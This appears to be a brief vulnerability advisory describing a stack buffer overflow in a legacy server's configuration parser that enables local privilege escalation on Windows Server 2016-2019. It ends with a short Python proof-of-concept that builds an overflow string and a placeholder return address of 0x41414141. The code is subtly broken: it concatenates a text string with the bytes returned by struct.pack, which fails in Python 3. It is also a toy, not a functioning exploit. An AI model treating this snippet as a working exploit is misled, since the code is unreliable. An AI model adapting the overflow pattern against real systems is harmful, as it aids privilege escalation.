A stack-based buffer overflow vulnerability in the legacy server application allows local privilege escalation. The vulnerability exists in the configuration parser function.
Legacy Server App 1.0-1.5, Windows Server 2016-2019
import struct
# Buffer overflow POC
buffer = "A" * 1024
ret_addr = struct.pack("<I", 0x41414141)
payload = buffer + ret_addr
print(f"Payload: {payload}")